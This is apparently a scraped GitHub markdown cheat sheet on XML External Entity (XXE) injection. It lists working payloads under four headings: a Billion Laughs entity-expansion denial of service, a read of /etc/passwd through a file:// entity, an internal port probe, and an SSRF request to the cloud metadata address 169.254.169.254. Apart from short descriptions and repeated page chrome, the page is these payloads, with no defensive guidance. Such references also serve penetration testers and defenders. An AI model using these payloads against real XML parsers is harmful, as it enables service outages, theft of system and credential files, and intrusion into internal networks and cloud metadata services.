XXE(XML External Entity Injection)

DoS
Arbitrary File Read
Reconnaisance
SSRF

DoS

It can lead to excessive resource usage on the server, causing service interruptions.

Billion Laughs Attack

<?xml version="1.0"?>
<!DOCTYPE lolz [
    <!ENTITY lol "lol">
    <!ENTITY lol1 "&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;">
    <!ENTITY lol2 "&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;">
    <!ENTITY lol3 "&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;">
]>
<root>&lol3;</root>

Arbitrary File Read

It is possible to access the file system and read sensitive information.

LFI

<?xml version="1.0"?>
<!DOCTYPE foo [
    <!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<foo>&xxe;</foo>

Reconnaisance

It can be used for internal network mapping.

port scanning

<?xml version="1.0"?>
<!DOCTYPE foo [
    <!ENTITY xxe SYSTEM "http://192.168.0.1:8080"> 
]>
<foo>&xxe;</foo>

SSRF

It is possible to interact with internal services.

SSRF

<?xml version="1.0"?>
<!DOCTYPE foo [
    <!ENTITY xxe SYSTEM "http://169.254.169.254/">
]>
<foo>&xxe;</foo>

Provide feedback

Saved searches

Use saved searches to filter your results more quickly

XXE(XML External Entity Injection)

Table of Contents

DoS

It can lead to excessive resource usage on the server, causing service interruptions.

Arbitrary File Read

It is possible to access the file system and read sensitive information.

Reconnaisance

It can be used for internal network mapping.

SSRF

It is possible to interact with internal services.

FilesExpand file tree

XXE.md

Latest commit

History

XXE.md

File metadata and controls

XXE(XML External Entity Injection)

Table of Contents

DoS

It can lead to excessive resource usage on the server, causing service interruptions.

Arbitrary File Read

It is possible to access the file system and read sensitive information.

Reconnaisance

It can be used for internal network mapping.

SSRF

It is possible to interact with internal services.